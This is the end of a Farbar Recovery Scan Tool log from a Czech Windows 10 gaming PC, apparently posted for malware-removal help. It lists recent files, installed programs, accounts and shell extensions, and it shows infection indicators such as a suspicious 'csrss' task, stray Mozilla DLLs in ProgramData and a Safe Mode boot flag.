2020-10-20 16:26 - 2020-10-20 21:15 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eca8707e3f
2020-10-20 16:14 - 2020-10-20 16:22 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6eaf808aca1
2020-10-20 16:10 - 2020-10-20 16:10 - 000003478 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore1d6a6ea70046158
2020-10-20 16:03 - 2020-10-20 16:29 - 000129056 _____ (Malwarebytes) C:\WINDOWS\system32\Drivers\mbae.sys
2020-10-20 16:02 - 2020-10-20 16:30 - 000000000 ____D C:\ProgramData\Malwarebytes
2020-10-20 16:00 - 2020-10-20 16:00 - 002062144 _____ (Malwarebytes) C:\Users\42072\Downloads\MBSetup.exe
2020-10-20 16:00 - 2020-10-20 16:00 - 000000000 ____D C:\Program Files\Malwarebytes
2020-10-16 15:51 - 2020-10-16 15:51 - 000755728 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.5.exe
2020-10-16 15:41 - 2020-10-16 15:41 - 000000216 _____ C:\Users\42072\Desktop\SMITE - Public Test.url
2020-10-15 20:02 - 2020-10-15 20:02 - 000003460 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineUA
2020-10-15 20:02 - 2020-10-15 20:02 - 000003336 _____ C:\WINDOWS\system32\Tasks\GoogleUpdateTaskMachineCore
2020-10-13 17:06 - 2020-10-13 17:06 - 000000000 ____D C:\WINDOWS\system32\Tasks\Mozilla
2020-10-12 12:47 - 2020-10-12 12:47 - 000000000 ____D C:\Users\42072\Documents\My Games
2020-10-12 12:04 - 2020-10-12 12:04 - 000000000 ____D C:\Users\42072\AppData\Roaming\EasyAntiCheat
2020-10-12 12:03 - 2020-10-12 12:04 - 000000000 ____D C:\Program Files\EasyAntiCheat
2020-10-11 12:39 - 2020-10-11 12:39 - 000755720 _____ (Moonsworth, LLC) C:\Users\42072\Downloads\Lunar Client v2.3.4.exe
2020-10-11 12:02 - 2020-10-16 15:41 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-11 12:02 - 2020-10-11 12:02 - 000000216 _____ C:\Users\42072\Desktop\SMITE.url
2020-10-11 11:36 - 2020-10-11 11:36 - 000000000 ____D C:\Users\42072\AppData\Local\Steam
2020-10-11 11:33 - 2020-10-20 15:36 - 000000000 ____D C:\Program Files\Common Files\Steam
2020-10-11 11:32 - 2020-10-20 21:16 - 000000000 ____D C:\Program Files\Steam
2020-10-11 11:32 - 2020-10-11 11:32 - 001573568 _____ C:\Users\42072\Downloads\SteamSetup.exe
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\Users\Public\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000994 _____ C:\ProgramData\Desktop\Steam.lnk
2020-10-11 11:32 - 2020-10-11 11:32 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam
2020-10-10 22:27 - 2020-10-10 22:27 - 000036044 _____ C:\Users\42072\Downloads\PVP-h.webp
2020-10-10 19:28 - 2020-10-10 22:06 - 1716267027 _____ C:\Users\42072\Downloads\Star-Wars-cast-1.cz-dabing.avi
2020-10-10 18:11 - 2020-10-10 18:11 - 000000000 ____D C:\Program Files\Common Files\Oracle
2020-10-10 18:10 - 2020-10-10 18:10 - 000000000 ____D C:\Program Files\Common Files\Java
2020-10-10 18:05 - 2020-10-10 19:03 - 1048576000 _____ C:\Users\42072\Downloads\Star Wars Epizoda I - Skrytá hrozba (1999).mkv.7z.004
2020-10-09 18:02 - 2020-10-09 18:02 - 067953134 _____ C:\Users\42072\Downloads\RiotClientServices.exe.ogdo
2020-10-09 16:28 - 2020-09-25 21:04 - 000000077 _____ C:\Users\42072\Desktop\pack.mcmeta
2020-10-09 15:14 - 2020-10-09 15:15 - 000000000 ____D C:\Users\42072\Desktop\hudebka
2020-10-09 15:10 - 2020-10-09 15:14 - 369135537 _____ C:\Users\42072\Downloads\zasilka-DK2W5P8NG9U6YNLM.zip
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\Users\Public\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000002155 _____ C:\ProgramData\Desktop\Serious Sam 2.lnk
2020-09-27 15:04 - 2020-09-27 15:04 - 000000000 ____D C:\WINDOWS\system32\directx
2020-09-27 15:01 - 2016-03-26 15:57 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam 2 CZ (v2.070)
2020-09-27 12:36 - 2020-09-27 15:00 - 2601257270 _____ C:\Users\42072\Downloads\Serious Sam 2 CZ (v2.070).rar
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\Users\Public\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:47 - 2020-09-26 19:47 - 000002055 _____ C:\ProgramData\Desktop\Serious Sam 3 BFE.lnk
2020-09-26 19:45 - 2020-09-26 19:47 - 000000000 ____D C:\Program Files\Serious Sam 3 BFE
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\Serious Sam
2020-09-26 19:40 - 2020-09-26 19:41 - 000000000 ____D C:\Users\42072\Desktop\party
2020-09-25 18:13 - 2020-09-25 18:13 - 000000000 ____D C:\Program Files\directx
2020-09-25 17:57 - 2020-09-25 17:57 - 000028400 _____ C:\WINDOWS\system32\Drivers\SECDRV.SYS
2020-09-25 17:54 - 2020-09-25 17:54 - 000001039 _____ C:\Users\42072\Desktop\GameSpy Arcade.lnk
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\GameSpy Arcade
2020-09-25 17:54 - 2020-09-25 17:54 - 000000000 ____D C:\Program Files\GameSpy Arcade
2020-09-25 17:51 - 2020-09-27 15:03 - 000000000 ____D C:\Program Files\Croteam
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\Users\42072\AppData\Roaming\VEGAS
2020-09-25 17:35 - 2020-09-25 17:35 - 000000000 ____D C:\ProgramData\Magix
2020-09-25 17:16 - 2020-09-25 17:16 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Logitech
2020-09-20 11:27 - 2020-09-20 11:27 - 112859648 _____ (Logitech Inc.) C:\Users\42072\Downloads\LGS_9.00.42_x86_Logitech.exe
2020-09-20 11:21 - 2020-09-20 11:22 - 113978120 _____ (Logicool Inc.) C:\Users\42072\Downloads\LGS_9.02.65_x86_Logicool.exe
2020-09-20 11:06 - 2020-09-20 11:07 - 036588168 _____ (Logitech, Inc.) C:\Users\42072\Downloads\lghub_installer.exe
==================== One month (modified) ==================
(If an entry is included in the fixlist, the file/folder will be moved.)
2020-10-20 21:21 - 2020-09-03 08:47 - 001605602 _____ C:\WINDOWS\system32\PerfStringBackup.INI
2020-10-20 21:21 - 2019-12-07 14:21 - 000682184 _____ C:\WINDOWS\system32\perfh005.dat
2020-10-20 21:21 - 2019-12-07 14:21 - 000137000 _____ C:\WINDOWS\system32\perfc005.dat
2020-10-20 21:21 - 2019-12-07 08:10 - 000000000 ____D C:\WINDOWS\INF
2020-10-20 21:17 - 2020-09-03 08:50 - 000000006 ____H C:\WINDOWS\Tasks\SA.DAT
2020-10-20 21:17 - 2020-09-03 08:40 - 000008192 ___SH C:\DumpStack.log.tmp
2020-10-20 21:17 - 2019-12-07 08:03 - 000524288 _____ C:\WINDOWS\system32\config\BBI
2020-10-20 21:15 - 2020-09-03 08:50 - 000003572 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineUA
2020-10-20 21:15 - 2020-04-24 17:59 - 000000000 ____D C:\Users\42072\AppData\Local\LogMeIn Hamachi
2020-10-20 16:56 - 2020-09-11 18:30 - 000003270 _____ C:\WINDOWS\system32\Tasks\csrss
2020-10-20 16:56 - 2019-12-07 08:12 - 000000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2020-10-20 16:40 - 2019-12-07 08:12 - 000000000 ____D C:\WINDOWS\AppReadiness
2020-10-20 16:35 - 2019-10-04 18:17 - 000000000 ____D C:\Users\42072\AppData\LocalLow\Mozilla
2020-10-20 16:32 - 2020-09-06 16:53 - 000000000 ____D C:\Users\42072\.MobiVBox
2020-10-20 16:30 - 2020-09-06 16:31 - 000000000 ____D C:\Users\42072\AppData\Local\MobiGame
2020-10-20 16:06 - 2020-09-03 08:50 - 000003448 _____ C:\WINDOWS\system32\Tasks\MicrosoftEdgeUpdateTaskMachineCore
2020-10-20 15:59 - 2020-08-20 11:14 - 000007602 _____ C:\Users\42072\AppData\Local\Resmon.ResmonCfg
2020-10-20 15:55 - 2020-09-03 08:40 - 000000000 ____D C:\WINDOWS\system32\SleepStudy
2020-10-20 15:05 - 2020-09-03 08:08 - 000000000 ____D C:\Users\42072
2020-10-18 19:51 - 2020-09-06 17:13 - 000000000 ____D C:\Users\42072\AppData\Local\GeometryDash
2020-10-18 19:49 - 2019-10-04 18:40 - 000000000 ____D C:\Users\42072\AppData\Roaming\.minecraft
2020-10-18 19:02 - 2020-03-17 19:18 - 000000000 ____D C:\Users\42072\AppData\Roaming\lunarclient
2020-10-17 12:40 - 2019-12-07 08:12 - 000000000 ___HD C:\Program Files\WindowsApps
2020-10-17 12:39 - 2020-06-13 16:22 - 000002365 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\Users\Public\Desktop\Microsoft Edge.lnk
2020-10-17 12:39 - 2020-06-13 16:22 - 000002203 _____ C:\ProgramData\Desktop\Microsoft Edge.lnk
2020-10-15 19:53 - 2020-09-02 20:26 - 000000000 ____D C:\Program Files\Mozilla Firefox
2020-10-14 20:43 - 2020-06-07 17:52 - 000000000 ____D C:\Program Files\R.G. Mechanics
2020-10-14 20:33 - 2019-12-07 14:39 - 000000000 ____D C:\Users\42072\AppData\Roaming\Spotify
2020-10-14 19:55 - 2020-05-19 11:17 - 000000000 ____D C:\Users\42072\AppData\Local\ElevatedDiagnostics
2020-10-13 17:06 - 2019-10-04 18:20 - 000001166 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Firefox.lnk
2020-10-12 11:39 - 2019-10-04 17:12 - 000000000 ____D C:\ProgramData\Package Cache
2020-10-10 18:11 - 2019-10-05 12:00 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2020-10-10 18:11 - 2019-10-05 11:59 - 000000000 ____D C:\Program Files\Java
2020-10-10 18:08 - 2019-10-05 12:00 - 000164008 _____ (Oracle Corporation) C:\WINDOWS\system32\WindowsAccessBridge.dll
2020-10-10 14:21 - 2019-10-04 16:40 - 000000000 ____D C:\WINDOWS\system32\Drivers\wd
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\Users\Public\Desktop\League of Legends.lnk
2020-10-09 17:59 - 2020-03-29 13:06 - 000001882 _____ C:\ProgramData\Desktop\League of Legends.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002247 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\Users\Public\Desktop\Google Chrome.lnk
2020-10-09 15:26 - 2020-03-19 22:17 - 000002206 _____ C:\ProgramData\Desktop\Google Chrome.lnk
2020-10-02 16:15 - 2019-10-05 13:55 - 000000000 ____D C:\Users\42072\AppData\Roaming\TS3Client
2020-09-28 11:49 - 2019-10-04 18:17 - 000000000 ____D C:\ProgramData\Mozilla
2020-09-25 21:50 - 2020-07-05 16:54 - 000000000 ____D C:\Users\42072\Desktop\assets
2020-09-25 18:20 - 2020-03-17 14:21 - 000000000 ____D C:\Program Files\Common Files\InstallShield
2020-09-25 18:19 - 2020-03-17 14:32 - 000000000 ___HD C:\Program Files\InstallShield Installation Information
2020-09-25 17:19 - 2020-06-05 22:24 - 000000000 ____D C:\Program Files\Logitech Gaming Software
2020-09-20 11:29 - 2020-07-10 19:33 - 000000000 ____D C:\Users\Public\Logi
==================== Files in the root of some directories ========
2020-09-11 18:26 - 2020-09-11 18:26 - 000334288 _____ (Mozilla Foundation) C:\ProgramData\freebl3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000137168 _____ (Mozilla Foundation) C:\ProgramData\mozglue.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000440120 _____ (Microsoft Corporation) C:\ProgramData\msvcp140.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 001246160 _____ (Mozilla Foundation) C:\ProgramData\nss3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000144848 _____ (Mozilla Foundation) C:\ProgramData\softokn3.dll
2020-09-11 18:26 - 2020-09-11 18:26 - 000083784 _____ (Microsoft Corporation) C:\ProgramData\vcruntime140.dll
2020-06-06 15:47 - 2017-06-27 17:26 - 000360779 _____ () C:\Users\42072\AppData\Roaming\BetterPvP_1.13.1.1_Forge_1.8.9.jar
2020-06-06 15:47 - 2018-03-10 12:06 - 000012002 _____ () C:\Users\42072\AppData\Roaming\MemoryFix-0.3.jar
2020-06-06 15:47 - 2017-11-21 18:52 - 000004306 _____ () C:\Users\42072\AppData\Roaming\MouseDelayFix-1.0.jar
2020-06-06 15:47 - 2017-01-07 22:50 - 000073014 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 Classloader FORGE MC1.8.9.jar
2020-06-06 15:47 - 2017-01-07 03:08 - 002261831 _____ () C:\Users\42072\AppData\Roaming\OldAnimationsMod v2.3.1 FORGE MC1.8.9.jar
2020-06-06 15:47 - 2018-04-20 16:30 - 002016181 _____ () C:\Users\42072\AppData\Roaming\OptiFine_1.8.9_HD_U_I7.jar
2020-06-06 15:47 - 2018-09-04 12:02 - 000073508 _____ () C:\Users\42072\AppData\Roaming\Orange's+Simple+Mods-1.2.jar
2020-06-06 15:47 - 2018-09-04 11:52 - 000015089 _____ () C:\Users\42072\AppData\Roaming\TimeChanger-1.0 (1.8.9).jar
2020-05-21 11:55 - 2020-05-22 10:43 - 000000035 _____ () C:\Users\42072\AppData\Roaming\WB.CFG
2020-06-06 15:47 - 2018-03-17 14:05 - 000062916 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] BetterFps-1.2.0.jar
2020-06-06 15:47 - 2018-03-17 13:51 - 000058995 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] FoamFixUnofficial.jar
2020-06-06 15:47 - 2018-03-04 16:59 - 000006718 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] NameChanger.jar
2020-06-06 15:47 - 2018-09-04 11:59 - 000026327 _____ () C:\Users\42072\AppData\Roaming\[1.8.9] Powns Coords HUD - 1.0.jar
2020-06-06 15:47 - 2018-10-02 18:18 - 000024908 _____ () C:\Users\42072\AppData\Roaming\[v3] (1.8.9) canelex3keystrokes.jar
2020-09-11 18:32 - 2020-09-11 18:32 - 000000559 _____ () C:\Users\42072\AppData\Local\bowsakkdestx.txt
2020-08-20 11:14 - 2020-10-20 15:59 - 000007602 _____ () C:\Users\42072\AppData\Local\Resmon.ResmonCfg
==================== SigCheck ============================
(There is no automatic fix for files that do not pass verification.)
safeboot: Minimal => The system is configured to boot to Safe Mode <==== ATTENTION
==================== End of FRST.txt ========================
Additional scan result of Farbar Recovery Scan Tool (x86) Version: 19-10-2020
Ran by 42072 (20-10-2020 22:10:00)
Running from C:\Users\42072\Desktop
Microsoft Windows 10 Pro Version 2004 19041.450 (X86) (2020-09-03 06:51:10)
Boot Mode: Safe Mode (minimal)
==========================================================
==================== Accounts: =============================
42072 (S-1-5-21-3093974370-3673700369-3101221773-1002 - Administrator - Enabled) => C:\Users\42072
Administrator (S-1-5-21-3093974370-3673700369-3101221773-500 - Administrator - Disabled)
DefaultAccount (S-1-5-21-3093974370-3673700369-3101221773-503 - Limited - Disabled)
Guest (S-1-5-21-3093974370-3673700369-3101221773-501 - Limited - Disabled)
WDAGUtilityAccount (S-1-5-21-3093974370-3673700369-3101221773-504 - Limited - Disabled)
==================== Security Center ========================
(If an entry is included in the fixlist, it will be removed.)
AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: AVG Antivirus (Enabled - Up to date) {4FC75CA5-1654-5411-7CFB-1893D506BCF4}
==================== Installed Programs ======================
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
AMD Catalyst Control Center (HKLM\...\WUCCCApp) (Version: 1.00.0000 - AMD)
DAEMON Tools Lite (HKLM\...\DAEMON Tools Lite) (Version: 10.12.0.1152 - Disc Soft Ltd)
DiskFixer version 1.0 (HKLM\...\DiskFixer_is1) (Version: 1.0 - MyAppsLand) <==== ATTENTION
DNPlayer, âĺđńč˙ 5.7.8.13 (HKLM\...\{51D1A917-78AE-4E70-B8DC-88412D7B7226}_is1) (Version: 5.7.8.13 - DNPlayer)
Duke Nukem - Manhattan Project (HKLM\...\{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment) Hidden
Duke Nukem - Manhattan Project (HKLM\...\InstallShield_{8B9336DB-8D04-4325-BAFC-C7141D8E6CA1}) (Version: 1.0.0 - Arush Entertainment)
DVD Architect (HKLM\...\{1D8D144F-3558-11E9-A3D6-00155D6302F2}) (Version: 7.0.100 - VEGAS)
Epic Games Launcher (HKLM\...\{1D4EB18B-0FEE-444E-B4D1-6F2CFBC363E6}) (Version: 1.1.267.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x86) (HKLM\...\{B633DAAD-9294-4C7D-A625-D5B741A8C2B6}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Fraps (HKLM\...\Fraps) (Version: - )
GameSpy Arcade (HKLM\...\GameSpy Arcade) (Version: - )
Google Chrome (HKLM\...\Google Chrome) (Version: 86.0.4240.75 - Google LLC)
Google Update Helper (HKLM\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.36.31 - Google LLC) Hidden
Chromium (HKLM\...\{F0FB183B-A07B-C9BB-11FB-B93BC17B6ABB}) (Version: - )
Java 8 Update 261 (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F32180261F0}) (Version: 8.0.2610.12 - Oracle Corporation)
Launcher Prerequisites (x86) (HKLM\...\{ec50c375-be9a-4642-9b8c-86dcc42e39c3}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Riot Game league_of_legends.live) (Version: - Riot Games, Inc)
Logitech Gaming Software 9.00 (HKLM\...\Logitech Gaming Software) (Version: 9.00.42 - Logitech Inc.)
Logitech Options (HKLM\...\LogiOptions) (Version: 8.20.329 - Logitech)
LogMeIn Hamachi (HKLM\...\{ECC0FA07-863E-44BC-8B1D-DA22F96E5FB7}) (Version: 2.2.0.633 - LogMeIn, Inc.) Hidden
LogMeIn Hamachi (HKLM\...\LogMeIn Hamachi) (Version: 2.2.0.633 - LogMeIn, Inc.)
Lunar Client (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\1fcec38f-e773-5444-8669-32b8eb41524b) (Version: 2.3.5 - Moonsworth, LLC)
Macrium Reflect Free Edition (HKLM\...\{7488FFD6-2CB1-4A7B-A788-3BCA60A44E7D}) (Version: 7.2.5107 - Paramount Software (UK) Ltd.) Hidden
Macrium Reflect Free Edition (HKLM\...\MacriumReflect) (Version: 7.2 - Paramount Software (UK) Ltd.)
Microsoft Edge (HKLM\...\Microsoft Edge) (Version: 86.0.622.43 - Microsoft Corporation)
Microsoft Edge Update (HKLM\...\Microsoft Edge Update) (Version: 1.3.135.49 - )
Microsoft Office Professional Plus 2016 (HKLM\...\Office16.PROPLUS) (Version: 16.0.4266.1001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable - x86 8.0.61001 (HKLM\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (HKLM\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Minecraft Launcher (HKLM\...\{CFF44AE9-2908-4D7D-B48B-1CB5139015C7}) (Version: 1.0.0.0 - Mojang)
MobiGame (HKLM\...\{D400ECB0-A0E7-49EC-AF24-D449A4671D11}) (Version: 3.8.15.0 - MobiGame)
Mozilla Firefox 81.0.2 (x86 cs) (HKLM\...\Mozilla Firefox 81.0.2 (x86 cs)) (Version: 81.0.2 - Mozilla)
Nástroje kontroly pravopisu pro Microsoft Office 2016 – čeština (HKLM\...\{90160000-001F-0405-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
Nástroje korektúry balíka Microsoft Office 2016 - slovenčina (HKLM\...\{90160000-001F-041B-0000-0000000FF1CE}) (Version: 16.0.4266.1001 - Microsoft Corporation) Hidden
OBS Studio (HKLM\...\OBS Studio) (Version: 25.0.8 - OBS Project)
Paragon Migrate OS to SSD™ (HKLM\...\{D4378A80-C713-11DF-9399-005056C00008}) (Version: 90.00.0003 - Paragon Software)
Pic version 10.2 (HKLM\...\{13E374E4-E610-4F9E-ACC4-E461DA17D869}_is1) (Version: 10.2 - Pics)
pvk_5.4.2.3, âĺđńč˙ 5.4.2.3 (HKLM\...\{212945B6-8BD1-4CBE-9399-685AB22FAB51}_is1) (Version: 5.4.2.3 - isp)
Serious Sam 2 verze 2.070 (HKLM\...\{C5E4298B-3581-4AAD-9FAF-2FE76C07EFC8}_is1) (Version: 2.070 - Croteam)
Serious Sam 3 BFE (HKLM\...\{97425B85-2311-435E-9A28-0AA11B41E322}_is1) (Version: - Croteam)
Seznam Software (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\SeznamInstall) (Version: 2.1.32 - Seznam.cz)
Spotify (HKU\S-1-5-21-3093974370-3673700369-3101221773-1002\...\Spotify) (Version: 1.1.35.458.g891674f3 - Spotify AB)
Steam (HKLM\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
Super Meat Boy v1.5 (HKLM\...\Super Meat Boy v1.5_is1) (Version: - Team Meat)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.3.0 - TeamSpeak Systems GmbH)
WinRAR 5.90 beta 3 (32-bit) (HKLM\...\WinRAR archiver) (Version: 5.90.3 - win.rar GmbH)
Packages:
=========
Doplněk multimediálního modulu pro aplikaci Fotografie -> C:\Program Files\WindowsApps\Microsoft.Photos.MediaEngineDLC_1.0.0.0_x86__8wekyb3d8bbwe [2020-04-27] (Microsoft Corporation)
Instagram -> C:\Program Files\WindowsApps\Facebook.InstagramBeta_42.0.2.0_neutral__8xx8rvfyw5nnt [2020-05-12] (Instagram)
Media Player Go -> C:\Program Files\WindowsApps\38806TusharKoshti.MediaPlayerGo_4.1.0.0_x86__8xyfwj0nb922c [2020-09-06] (Tushar Koshti)
Microsoft Advertising SDK for XAML -> C:\Program Files\WindowsApps\Microsoft.Advertising.Xaml_10.1811.1.0_x86__8wekyb3d8bbwe [2019-11-05] (Microsoft Corporation) [MS Ad]
Microsoft Mahjong -> C:\Program Files\WindowsApps\Microsoft.MicrosoftMahjong_3.11.6020.0_x86__8wekyb3d8bbwe [2020-06-09] (Microsoft Studios) [MS Ad]
Microsoft Solitaire Collection -> C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_4.7.8101.0_x86__8wekyb3d8bbwe [2020-09-06] (Microsoft Studios) [MS Ad]
UnRar Metro -> C:\Program Files\WindowsApps\1253QUANTUMVM.UNRARMETRO_14.5.0.0_x86__ckbnxvahp5f44 [2020-06-12] (QuantumVM)
==================== Custom CLSID (Whitelisted): ==============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{1BF42E4C-4AF4-4CFD-A1A0-CF2960B8F63E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{7AFDFDDB-F914-11E4-8377-6C3BE50D980C}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{82CA8DE3-01AD-4CEA-9D75-BE4C51810A9E}\InprocServer32 -> C:\Users\42072\AppData\Local\Microsoft\OneDrive\19.232.1124.0010\FileSyncShell.dll => No File
CustomCLSID: HKU\S-1-5-21-3093974370-3673700369-3101221773-1002_Classes\CLSID\{E7629152-0A34-4487-B787-5D1144304455}\localserver32 -> no filepath
ShellIconOverlayIdentifiers: [ OneDrive1] -> {BBACC218-34EA-4666-9D7A-C78F2274A524} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive2] -> {5AB7172C-9C11-405C-8DD5-AF20F3606282} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive3] -> {A78ED123-AB77-406B-9962-2A5D9D2F7F30} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive4] -> {F241C880-6982-4CE5-8CF7-7085BA96DA5A} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive5] -> {A0396A93-DC06-4AEF-BEE9-95FFCCAEF20E} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive6] -> {9AA2F32D-362A-42D9-9328-24A483E2CCC3} => -> No File
ShellIconOverlayIdentifiers: [ OneDrive7] -> {C5FF006E-2AE9-408C-B85B-2DFDD5449D9C} => -> No File
ContextMenuHandlers1: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers1: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
ContextMenuHandlers2: [DaemonShellExtDriveLite] -> {C06369D6-E77D-4626-9656-1256312BD576} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers2: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers2: [ReflectShellExt] -> {DEBB9B79-B3DD-47F4-9E5C-EA6975BAB611} => C:\Program Files\Macrium\Reflect\RContextMenu.dll [2019-09-20] (Paramount Software UK Ltd -> Paramount Software UK Ltd)
ContextMenuHandlers3: [DaemonShellExtImageLite] -> {1D1B5D7B-0FC9-452E-902C-12BACD4FBC20} => C:\Program Files\DAEMON Tools Lite\dtshl32.dll [2020-03-19] (AVB Disc Soft, SIA -> Disc Soft Ltd)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\ATI Technologies\ATI.ACE\Core-Static\atiacmxx.dll [2015-11-04] (Advanced Micro Devices, Inc. -> Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [ESET Security Shell] -> {B089FE88-FB52-11D3-BDF1-0050DA34150D} => C:\Program Files\ESET\ESET Security\shellExt.dll -> No File
ContextMenuHandlers6: [WinRAR] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2020-03-09] (win.rar GmbH -> Alexander Roshal)
==================== Codecs (Whitelisted) ====================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Drivers32: [VIDC.FPS1] => C:\WINDOWS\system32\frapsvid.dll [94208 2019-08-30] (Beepa P/L) [File not signed]
==================== Shortcuts & WMI ========================
(The entries could be listed to be restored or removed.)
ShortcutWithArgument: C:\Users\42072\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WarThunder\WarThunder.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://go.playmmogames.com/aff_c?offer_id=698&aff_id=1034&source=3&aff_sub2=WGcGZy4UcmYtFXMUWmcHZkRjAEcKNQITUDYAHFExDglaZAMcRGfipJgAAAGhXNyUie&click_id=f306cd3d4dae7747931f684cc695e9d8357f3ee3
